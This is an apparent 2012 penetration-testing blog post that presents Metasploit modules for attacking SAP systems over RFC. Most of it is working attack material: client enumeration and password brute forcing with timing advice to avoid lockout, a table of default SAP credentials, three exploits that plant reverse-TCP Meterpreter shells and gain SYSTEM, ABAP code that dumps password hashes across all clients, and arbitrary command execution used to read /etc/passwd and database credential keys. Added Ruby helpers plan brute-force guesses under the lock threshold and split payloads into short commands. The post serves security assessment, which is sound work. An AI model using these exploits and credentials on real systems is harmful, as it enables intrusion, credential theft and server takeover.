MWR SAP Metasploit Modules

on 27 April, 2012

We have recently developed several Metasploit auxiliary and exploitation modules to assist consultants in assessing SAP systems, and Dave has also delivered a presentation “SAP Slapping (a pentesters guide)” at CRESTCon and BSides London where some of these modules were demonstrated.

We plan to submit these modules to the Metasploit Framework; however until this process is complete the modules will be available here. We have not yet finished all of the modules that we plan to write, so stay tuned for future updates.

Some of the modules are based on, or are direct ports of, plugins from the Onapsis Bizploit open source ERP penetration testing framework; others are original. Bizploit has been an essential tool for security consultants assessing SAP systems since its release, but the framework has not been updated since, and it was our inspiration for writing the Metasploit modules.

The intention behind writing the Metasploit modules, as opposed to contributing back to the Bizploit framework, was to encourage contributions from the community. Bizploit is written in Python and C and has not seen any community contributions; this is unfortunate. We’re hoping that the community finds it easier to contribute to the Metasploit framework and helps to build an even more impressive free and open source SAP assessment tool set leveraging the capabilities of the Metasploit framework.

Update: all the modules are now in the MSF trunk and the Q repository.

Mariano Nuñez (the author of the Bizploit framework) helped in our efforts in producing the Metasploit modules and was happy to share his knowledge and experience – a very cool guy. We’d also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis who have Beta tested the modules and provided excellent feedback. Some people just seem to enjoy hacking SAP.

The majority of the modules rely on the SAP NW RFC SDK and require the Ruby wrapper ‘nwrfc’ by Martin Ceronio.

Unfortunately the NW RFC SDK is available only to those who have access to the SAP Service Marketplace (SMP). In order to get access to the SAP Marketplace you need an S-ID, password and customer number. Alternatively the required library files (such as libsapnwrfc) can be extracted from a SAP system (such as the freely available test drive systems). These third party requirements are one of the reasons that the submission to the Metasploit Framework is proving problematic.

At present the modules largely target issues in Remote Function Call (RFC), SAP's standard interface for communication between SAP systems and between SAP and non-SAP systems. RFC-enabled function modules are essentially independent ABAP modules that can be called locally or remotely, either through an ABAP interface or through the RFC API.

RFC communication is done through the Gateway Service (each instance of a SAP system has a gateway). The gateway enables communication between work processes and external programs, as well as communication between work processes from different instances or SAP Systems. There are more than 33,000 RFC-enabled function modules available in a standard SAP ECC 6.0 system.

We have completed seven auxiliary modules and three exploit modules (more will follow soon). Details of these are presented below.

sap_rfc_client_enum auxiliary module

In SAP terms a client is a self-contained unit within a system, with its own user master records and business data, identified by a three-digit number; it is what you select when logging on with the SAP GUI. The range is 000 to 999, and the clients created at installation are 000, 001 and 066. If you try to connect via RFC to a client that does not exist, SAP returns the error “Client is not available”, so it is possible to brute force the whole range to discover the clients that do exist.

The sap_rfc_client_enum module attempts to brute force the available SAP clients via the RFC interface.

./msfcli auxiliary/scanner/sap/sap_rfc_client_enum RHOSTS=172.16.252.135 RPORT=3342 E

[*] Brute forcing clients 000,001,066
[+] 172.16.252.135:3342 [SAP] client found - 000
[+] 172.16.252.135:3342 [SAP] client found - 001
[+] 172.16.252.135:3342 [SAP] client found - 066
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_brute_login auxiliary module

The default lockout threshold applied to SAP accounts (login/fails_to_user_lock) is typically 5 failed attempts. However, on many systems locked accounts are unlocked automatically at midnight (login/failed_user_auto_unlock), so if you are going to attempt a brute force attack, do it after the user has finished for the day and before 00:00. Check these values first: in the example below auto-unlock is set to 0, so an account you lock stays locked until an administrator releases it.

If you can communicate with the SAP Management Console via its SOAP interface you can extract the exact configuration (unauthenticated) by making use of the Metasploit module ‘sap_mgmt_con_getprocessparameter’ written by Chris John Riley. For more details on how this is possible see here.

msf > use auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
msf auxiliary(sap_mgmt_con_getprocessparameter) > set RHOST 172.16.252.135
RHOST => 172.16.252.135
msf auxiliary(sap_mgmt_con_getprocessparameter) > set MATCH login/fail
MATCH => login/fail
msf auxiliary(sap_mgmt_con_getprocessparameter) > run

[*] [SAP] Connecting to SAP Management Console SOAP Interface on 172.16.252.135:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 172.16.252.135:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] [SAP] Process Parameter Results for (?i-mx:login\/fail)

[SAP] Process Parameters
========================

Name Description Value
---- ----------- -----
login/failed_user_auto_unlock Enable automatic unlock off locked user at midnight 0
login/fails_to_session_end Number of invalid login attempts until session end 3
login/fails_to_user_lock Number of invalid login attempts until user lock 5


[*] Scanned 1 of 2 hosts (050% complete)
[*] [SAP] Connecting to SAP Management Console SOAP Interface on 10.0.0.192:50013
[*] [SAP] Regex match selected, skipping loot storage
[*] 10.0.0.192:50013 [SAP] Attempting to display configuration matches for (?i-mx:login\/fail)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
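To turn the parameter dump above into a guessing budget, here is an added example (not one of the MWR modules) that parses the sap_mgmt_con_getprocessparameter table and derives how many attempts per user stay below the lock threshold. The sample text is a constructed copy of the output shown above; the function names are ours.

```ruby
# Added example, not part of the MWR modules: read the process parameters
# printed by sap_mgmt_con_getprocessparameter and turn them into a guessing
# budget that stays below the lock threshold. The sample text is a
# constructed copy of the output shown above.

SAMPLE_OUTPUT = <<~TXT
  [SAP] Process Parameters
  ========================

  Name Description Value
  ---- ----------- -----
  login/failed_user_auto_unlock Enable automatic unlock off locked user at midnight 0
  login/fails_to_session_end Number of invalid login attempts until session end 3
  login/fails_to_user_lock Number of invalid login attempts until user lock 5
TXT

# Data rows read "<name> <description words> <value>": the name contains no
# spaces and the value is the last token, so take the first and last tokens.
def parse_process_parameters(text)
  params = {}
  text.each_line do |raw|
    line = raw.strip
    next unless line.start_with?('login/')
    name, rest = line.split(' ', 2)
    next if rest.nil?
    params[name] = rest.split(' ').last
  end
  params
end

# Derive the lockout policy. Missing parameters are reported as nil rather
# than guessed, because the defaults differ between SAP releases.
def lockout_policy(params)
  lock_after = params['login/fails_to_user_lock']
  lock_after = lock_after.to_i unless lock_after.nil?
  unlock = params['login/failed_user_auto_unlock']
  {
    lock_after: lock_after,
    # 0 disables locking in SAP; otherwise keep one attempt in reserve
    safe_guesses: (lock_after.nil? || lock_after.zero?) ? nil : lock_after - 1,
    # true: locked users are released at midnight, so a further batch can be
    # tried the next day; false: a locked user stays locked until an
    # administrator unlocks it, so only the first batch is safe
    auto_unlock_at_midnight: unlock.nil? ? nil : unlock == '1',
  }
end

# Split candidate passwords into batches that do not trip the lock. Returns
# only the batches that can actually be run: one if locked users are not
# released automatically (or the setting is unknown), otherwise one per day.
def guess_batches(policy, candidates)
  safe = policy[:safe_guesses]
  return [candidates] if safe.nil?
  batches = candidates.each_slice(safe).to_a
  policy[:auto_unlock_at_midnight] ? batches : batches.first(1)
end
```

Run against the dump above, the policy is lock after 5, so four guesses per user, and because auto-unlock is off only the first batch of candidates is safe to try.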

A list of default SAP system username and password combinations is contained in the table below.

User        Description                         Clients                        Password
----        -----------                         -------                        --------
SAP*        Super user                          000, 001, 066 & new clients    06071992 & PASS
DDIC        ABAP Dictionary super user          000, 001                       19920706
TMSADM      Transport Management System user    000                            PASSWORD
EARLYWATCH  EarlyWatch service user             066                            SUPPORT
SAPCPIC     Communications user                 000, 001                       ADMIN

The sap_rfc_brute_login module attempts to brute force the username and password combination via an exposed RFC interface.

./msfcli auxiliary/scanner/sap/sap_rfc_brute_login BLANK_PASSWORDS=false USER_AS_PASS=false RHOSTS=172.16.252.135 RPORT=3342 E

[*] Brute forcing clients 000,001,066

[SAP] Credentials
=================

host port client user pass status
---- ---- ------ ---- ---- ------
172.16.252.135 3342 000 SAP* 06071992 locked
172.16.252.135 3342 000 DDIC 19920706
172.16.252.135 3342 001 SAP* 06071992
172.16.252.135 3342 001 DDIC 19920706
172.16.252.135 3342 066 SAP* 06071992 locked
172.16.252.135 3342 066 EARLYWATCH SUPPORT

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_sxpg_call_system exploit module

The RFC SXPG_CALL_SYSTEM can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.

The sap_rfc_sxpg_call_system module exploits an arbitrary command execution vulnerability in the SXPG_CALL_SYSTEM RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.

msf > use exploit/windows/sap/sap_rfc_sxpg_call_system
msf exploit(sap_rfc_sxpg_call_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_sxpg_call_system) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_sxpg_call_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_sxpg_call_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_sxpg_call_system) > exploit

[*] Started reverse handler on 10.0.1.161:4444
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_CALL_SYSTEM RFC. We're limited to approx. 256 chars, be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 10 opened (10.0.1.161:4444 -> 10.0.1.150:55364) at Wed Mar 21 10:28:32 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64

sap_rfc_sxpg_command_exec exploit module

The RFC SXPG_COMMAND_EXECUTE can be used remotely to execute OS commands as configured in transaction SM69. Transaction SM69 is used to maintain external OS commands. On Windows systems, configured commands that accept additional parameters can be manipulated to execute arbitrary commands.

The sap_rfc_sxpg_command_exec module exploits an arbitrary command execution vulnerability in the SXPG_COMMAND_EXECUTE RFC to deliver a custom Metasploit payload. The exploit requires a valid command as configured in SM69 that accepts additional parameters.

msf > use exploit/windows/sap/sap_rfc_sxpg_command_exec
msf exploit(sap_rfc_sxpg_command_exec) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_sxpg_command_exec) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_sxpg_command_exec) > set CLIENT 001
CLIENT => 001
msf exploit(sap_rfc_sxpg_command_exec) > set USER SAP*
USER => SAP*
msf exploit(sap_rfc_sxpg_command_exec) > set PASS 06071992
PASS => 06071992
msf exploit(sap_rfc_sxpg_command_exec) > set CMD LIST_DB2DUMP
CMD => LIST_DB2DUMP
msf exploit(sap_rfc_sxpg_command_exec) > set OS 3
OS => 3
msf exploit(sap_rfc_sxpg_command_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_sxpg_command_exec) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_sxpg_command_exec) > set LPORT 4444
LPORT => 4444
msf exploit(sap_rfc_sxpg_command_exec) > exploit

[*] Started reverse handler on 10.0.1.161:4444
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload into LIST_DB2DUMP via SXPG_COMMAND_EXECUTE RFC. We're limited to approx. 256 chars, be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 2 opened (10.0.1.161:4444 -> 10.0.1.150:58640) at Wed Mar 21 13:40:41 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64

sap_rfc_system exploit module

The RFC_ABAP_INSTALL_AND_RUN function module takes ABAP source lines and executes them. It is deprecated, and in PROD environments it is commonly disabled or access to it revoked. That does not mean you will not find it enabled, nor that control of a DEV or QAS system does not offer a route into the PROD environment!

The sap_rfc_system module exploits an arbitrary command execution vulnerability in the RFC_ABAP_INSTALL_AND_RUN RFC to deliver a custom Metasploit payload.

msf > use exploit/windows/sap/sap_rfc_system
msf exploit(sap_rfc_system) > set RHOST 10.0.1.150
RHOST => 10.0.1.150
msf exploit(sap_rfc_system) > set RPORT 3300
RPORT => 3300
msf exploit(sap_rfc_system) > set CLIENT 001
CLIENT => 001
msf exploit(sap_rfc_system) > set USER SAP*
USER => SAP*
msf exploit(sap_rfc_system) > set PASS 06071992
PASS => 06071992
msf exploit(sap_rfc_system) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(sap_rfc_system) > set LHOST 10.0.1.161
LHOST => 10.0.1.161
msf exploit(sap_rfc_system) > set LPORT 3344
LPORT => 3344
msf exploit(sap_rfc_system) > exploit

[*] Started reverse handler on 10.0.1.161:3344
[*] Using custom payload size of 250
[+] 10.0.1.150:33000 [SAP] Successful login - 001:SAP*:06071992
[+] 10.0.1.150:33000 [SAP] Injecting payload via RFC_ABAP_INSTALL_AND_RUN RFC. We're limited to approx. 256 chars, be patient!
[*] Command Stager progress - 2.19% done (249/11366 bytes)
[*] Command Stager progress - 4.38% done (498/11366 bytes)
[*] Command Stager progress - 6.57% done (747/11366 bytes)
... snip ...
[*] Command Stager progress - 95.94% done (10904/11366 bytes)
[*] Command Stager progress - 98.06% done (11146/11366 bytes)
[*] Command Stager progress - 100.00% done (11366/11366 bytes)
[*] Sending stage (946176 bytes) to 10.0.1.150
[*] Meterpreter session 1 opened (10.0.1.161:3344 -> 10.0.1.150:64998) at Thu Mar 22 11:31:20 +0000 2012

meterpreter > getuid
Server username: GATEWAY\Administrator

meterpreter > getsystem
...got system (via technique 1).

meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7600).
Computer : GATEWAY
Architecture : x64
Meterpreter : x64/win64
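All three exploit runs above report the same constraint: the injected parameter is limited to roughly 256 characters, so an 11 KB stage has to be delivered in about 250-byte pieces. The following added example (not the modules' own command stager) models that staging step: it splits a text-encoded payload into append commands that each fit the limit and checks that the pieces reassemble. The command template, file name and sample payload are assumptions made for this illustration.

```ruby
# Added example, not the modules' own command stager: models the staging
# constraint visible in the three exploit runs above. The additional
# parameter an SM69 command accepts is short (the modules assume roughly 256
# characters), so a payload of several kilobytes is appended to a file on
# the target one small command at a time and executed only at the end. The
# command template, file name and sample payload are assumptions made for
# this illustration.

require 'base64'

# Assumed append command. No space before >> so no padding ends up in the file.
TEMPLATE = 'echo {chunk}>>stage.b64'

# Split the text-encoded payload into commands that each fit 'limit'.
def stage_commands(encoded, limit: 256, template: TEMPLATE)
  overhead = template.sub('{chunk}', '').length
  per = limit - overhead
  raise ArgumentError, 'limit too small for template' if per <= 0
  encoded.scan(/.{1,#{per}}/).map { |piece| template.sub('{chunk}') { piece } }
end

# Rebuild what the target's file contains after every command ran, so the
# attacker can confirm nothing was cut off before the final execute step.
def reassemble(commands, template: TEMPLATE)
  prefix, suffix = template.split('{chunk}', 2)
  commands.map { |c| c[prefix.length, c.length - prefix.length - suffix.length] }.join
end

# Constructed stand-in for a real stage: 1000 bytes, base64 encoded with no
# line breaks so each command carries printable text only.
def sample_payload
  Base64.strict_encode64((0...1000).map { |i| (i * 7 + 3) & 0xff }.pack('C*'))
end
```

With the 16-character template overhead each command carries 240 characters of payload, so the 1336-character sample needs six commands; a real 11 KB stage at this rate needs the forty-odd round trips the module output shows.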

sap_rfc_usr02 auxiliary module

SAP has used a number of password hashing mechanisms over time. The hashes are stored in the BCODE and PASSCODE columns of table USR02 (and of the change history table USH02): BCODE holds the older CODVN B hash and PASSCODE the SHA1-based CODVN F/G hash. This module uses the RFC_ABAP_INSTALL_AND_RUN RFC to extract the user hashes from USR02. The ABAP code executes native SQL, which bypasses automatic client handling, so it returns the hashes of all users across all clients. These can be cracked with John the Ripper. The ABAP source is below.

REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
* Work variables matching the USR02 columns (PWD_SHA1 is the PASSCODE type)
DATA: MANDT(3), BNAME(12), BCODE TYPE XUCODE, PASSC TYPE PWD_SHA1.
* Native SQL: no automatic client handling, so every client is returned
EXEC SQL PERFORMING loop_output.
  SELECT MANDT, BNAME, BCODE, PASSCODE INTO :MANDT, :BNAME, :BCODE, :PASSC
  FROM USR02
ENDEXEC.
* Called once per row; the list output is returned by RFC_ABAP_INSTALL_AND_RUN
FORM loop_output.
  WRITE: / MANDT, BNAME, BCODE, PASSC.
ENDFORM.

An example run is shown below.

./msfcli auxiliary/scanner/sap/sap_rfc_usr02 RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992

[SAP] Users and hashes
======================

MANDT Username BCODE PASSCODE
----- -------- ----- --------
000 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
000 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480
000 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000
000 TMSADM 942B9DC0F2394D85 C9AA19DA354DC8397D7AC8EA8B4C04DF49CB58FF
001 DDIC 61D26428640DBAB5 905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45
001 ADS_AGENT 8C32369322B732F6 FE0DD787EE7EBCBF4728BDC1A865A6F15B064611
001 ADSUSER 7FE24F5321515E7F CD83AD9E92B4E37E2255FEA11AC82234BA825FBD
001 SAPJSF 7D6762BFB7504CA4 93738A70AA83C6DAA6CD0B3B1853986333A29192
001 J2EE_ADMIN 6C1541BC997289D1 149E781A80383CC59AB04E88B51832819403364F
001 J2EE_GUEST 0000000000000000 0000000000000000000000000000000000000000
001 SAP* D0BFF4276DA1E208 8948310AF768FA9061598E8F68FD144CE65B7480
001 SAPCPIC 7D806C248F03813D 0000000000000000000000000000000000000000
001 DEVELOPER C4C768AEB4A99EF5 4BD353A8F1D8B453D58910CC87D24B0C1C9A9011
066 EARLYWATCH BD5E494D3ECBF5E2 0000000000000000000000000000000000000000
066 SAP* 29B60B2614510C1D 789C6E939E7BD99A554D79ABC214910A502EE407

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_read_table auxiliary module

This module makes use of the RFC_READ_TABLE function to extract arbitrary data from SAP tables.
WARNING: RFC_READ_TABLE truncates RAW data, so it cannot read the BCODE/PASSCODE fields from USR02/USH02: only the first half of each hash is returned. RFC_READ_TABLE sizes each output field from its dictionary length, so an 8-byte RAW field is given 8 characters of output when its hex representation needs 16. There is nothing you can do about it from the caller's side.

The text below is taken from SAP Note 382318.

"The scope of function module RFC_READ_TABLE is very restricted. E.g., due to the fixed maximum row size only smaller tables can be accessed. There are several data types that cannot be handled, and also there are doubts regarding the Unicode compatibility of the function module. However, all this is quite immaterial, because the function is not meant to be publicly used anyway. It was only created to be used as a sample in various training courses, and is clearly flagged as “not released for customer”.

Solution – Do not use function module RFC_READ_TABLE in the first place!"

./msfcli auxiliary/scanner/sap/sap_rfc_read_table RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 TABLE=USR02 FIELDS="MANDT,BNAME" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 001|ADSUSER
[+] 001|ADS_AGENT
[+] 001|DDIC
[+] 001|DEVELOPER
[+] 001|J2EE_ADMIN
[+] 001|J2EE_GUEST
[+] 001|SAP*
[+] 001|SAPCPIC
[+] 001|SAPJSF
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
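The truncation warning above is easier to see in a small model. The following added example is not a call to the real function module and is not part of the MWR modules; it reproduces the packing rule that causes the problem (each field is copied into a character work area with the length taken from the dictionary, which for RAW is a byte count, while the RAW value arrives as hex text needing two characters per byte). The field list is a constructed subset of USR02 and the hash values are the DDIC ones from the sap_rfc_usr02 output above.

```ruby
# Added example, not from the MWR modules and not a call to the real function
# module: a model of why RFC_READ_TABLE returns half of a RAW hash. The
# function module copies each requested field into a fixed character work
# area using an offset and length taken from the field's dictionary length,
# which for RAW is a byte count, while a RAW value arrives as hex text that
# needs two characters per byte. The field list is a constructed subset of
# USR02 (MANDT CLNT 3, BNAME CHAR 12, BCODE RAW 8, PASSCODE RAW 20).

USR02_FIELDS = [
  { name: 'MANDT',    type: :char, leng: 3 },
  { name: 'BNAME',    type: :char, leng: 12 },
  { name: 'BCODE',    type: :raw,  leng: 8 },
  { name: 'PASSCODE', type: :raw,  leng: 20 },
].freeze

# A field value as the work area receives it: CHAR unchanged, RAW as
# upper-case hex of the binary value.
def render(field, value)
  field[:type] == :raw ? value.unpack('H*').first.upcase : value.to_s
end

# Pack a row the way RFC_READ_TABLE does: every field gets exactly 'leng'
# characters, so a RAW field keeps only the first half of its hex.
def read_table_row(fields, row, delimiter: '|')
  fields.map { |f| render(f, row[f[:name]]).ljust(f[:leng])[0, f[:leng]] }.join(delimiter)
end

# The same row with RAW fields given their full width (2 characters per byte).
def full_row(fields, row, delimiter: '|')
  fields.map do |f|
    width = f[:type] == :raw ? f[:leng] * 2 : f[:leng]
    render(f, row[f[:name]]).ljust(width)
  end.join(delimiter)
end

# Names of requested fields that will come back truncated: the check to run
# on a FIELDS list before relying on RFC_READ_TABLE output.
def truncated_fields(fields)
  fields.select { |f| f[:type] == :raw }.map { |f| f[:name] }
end

# Constructed row using the DDIC hashes shown in the sap_rfc_usr02 output.
def sample_row
  {
    'MANDT' => '001',
    'BNAME' => 'DDIC',
    'BCODE' => ['61D26428640DBAB5'].pack('H*'),
    'PASSCODE' => ['905F5E6CE67B7C60D0F7BA9C4063AAF0D8602B45'].pack('H*'),
  }
end
```

For the DDIC row the model returns 61D26428 for BCODE and 905F5E6CE67B7C60D0F7 for PASSCODE, exactly the first half of each hash, which is why the page recommends the sap_rfc_usr02 module for hash extraction instead.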

sap_rfc_system auxiliary module

This module makes use of the RFC_ABAP_INSTALL_AND_RUN Remote Function Call to execute arbitrary OS commands via the ABAP SYSTEM kernel call. Commands run as the OS user of the application server work process (the <sid>adm user, npladm in the example below). The ABAP source is below.

REPORT EXTRACT LINE-SIZE 255 NO STANDARD PAGE HEADING.
TYPES lt_line(255) TYPE c.
* lv_cmd is 42 characters long: a longer command is silently truncated
DATA lv_cmd(42) TYPE c.
DATA lt_result TYPE STANDARD TABLE OF lt_line WITH HEADER LINE.
* '#{command}' is substituted by the Metasploit module (Ruby interpolation)
* before the source is sent to RFC_ABAP_INSTALL_AND_RUN
lv_cmd = '#{command}'.
* Kernel call: runs the command as the work process OS user and collects
* its output lines in lt_result
CALL 'SYSTEM' ID 'COMMAND' FIELD lv_cmd
              ID 'TAB'     FIELD lt_result-*sys*.
LOOP AT lt_result.
  WRITE : / lt_result.
ENDLOOP.

An example run is shown below.

./msfcli auxiliary/scanner/sap/sap_rfc_system RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] 172.16.252.135:3342 [SAP] Executed id

[SAP] Command Exec
==================

Output
------
uid=1001(npladm) gid=100(users) groups=100(users),1000(sapsys)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

sap_rfc_sxpg_command_exec auxiliary module

This module makes use of the SXPG_COMMAND_EXECUTE Remote Function Call to execute OS commands as configured in SM69. Transaction SM69 is used to maintain external OS commands.

1.1. File System

A number of OS commands are preconfigured in SM69 on a standard SAP install. Below, the module executes LIST_DB2DUMP (which maps to ls -la) on a UNIX system to view the attributes of the /etc/passwd file.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=LIST_DB2DUMP OS=2 PARAM="/etc/passwd" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: LIST_DB2DUMP /etc/passwd

[SAP] Command Exec
==================

Output
------
-rw-r--r-- 1 root root 1669 2011-11-02 12:58 /etc/passwd

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Below, the module executes the preconfigured CAT command on a UNIX system to view the contents of the /etc/passwd file.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=CAT OS=2 PARAM="/etc/passwd" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: CAT /etc/passwd

[SAP] Command Exec
==================

Output
------
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
dnsmasq:x:103:65534:dnsmasq:/var/lib/empty:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:109:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:105:107:User for haldaemon:/var/run/hald:/bin/false
lighttpd:x:101:102:user for lighttpd:/var/lib/lighttpd:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
npladm:x:1001:100:npladm:/home/npladm:/bin/csh
ntp:x:74:105:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:106:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:106:108:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
root:x:0:0:root:/root:/bin/bash
sapadm:x:1004:100:sapadm:/home/sapadm:/bin/csh
sdb:x:1002:100:sdb:/home/sdb:/bin/csh
sqdnpl:x:1003:100:sqdnpl:/home/sqdnpl:/bin/csh
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:108:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
testdrive:x:1000:100::/home/testdrive:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
yastws:x:107:110:User for YaST-Webservice:/var/lib/yastws:/bin/false

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

1.2. Database Pwnage

MaxDB has a mechanism similar to Oracle's REMOTE_OS_AUTHENT called XUSER. Database credentials are stored in a file named .XUSER.62 in the OS user's home directory, and an OS user who has this file can connect to the database by naming a stored user key alone, with no need to enter a username or password.

Below, the module executes the XUSER command (xuser list) to display the entries stored in the .XUSER.62 file. Note that the stored passwords are masked in the listing; it is the key names and database user names that matter for the next step.

./msfcli auxiliary/scanner/sap/sap_rfc_sxpg_command_exec RHOSTS=172.16.252.135 RPORT=3342 USER=SAP* PASS=06071992 CLIENT=001 CMD=XUSER OS=1 PARAM="list" E

[+] 172.16.252.135:3342 [SAP] Successful login - 001:SAP*:06071992
[+] Command Executed: XUSER list

[SAP] Command Exec
==================

Output
------
--------------
--------------
--------------
--------------
-----------------------------------------------------------------
-----------------------------------------------------------------
-----------------------------------------------------------------
-----------------------------------------------------------------
Cachelimit :-1
Cachelimit :-1
Cachelimit :-1
Cachelimit :-1
Charset :<unspecified>
Charset :<unspecified>
Charset :<unspecified>
Charset :<unspecified>
Dbname :NPL
Dbname :NPL
Dbname :NPL
Dbname :NPL
Isolation :-1
Isolation :-1
Isolation :-1
Isolation :0
Key :DEFAULT
Key :c
Key :c_J2EE
Key :w
Long Password :?????????
Long Password :?????????
Long Password :?????????
Long Password :?????????
Nodename :nplhost
Nodename :nplhost
Nodename :nplhost
Nodename :nplhost
Password :?????????
Password :?????????
Password :?????????
Password :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
PasswordUCS2 :?????????
Sqlmode :INTERNAL
Sqlmode :INTERNAL
Sqlmode :INTERNAL
Sqlmode :SAPR3
Timeout :-1
Timeout :-1
Timeout :-1
Timeout :0
Username :CONTROL
Username :CONTROL
Username :SAPNPL
Username :SUPERDBA
UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :C.O.N.T.R.O.L. . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :S.A.P.N.P.L. . . . . . . . . . . . . . . . . . . . . . . . . . .
UsernameUCS2 :S.U.P.E.R.D.B.A. . . . . . . . . . . . . . . . . . . . . . . . .
XUSER Entry 1
XUSER Entry 2
XUSER Entry 3
XUSER Entry 4

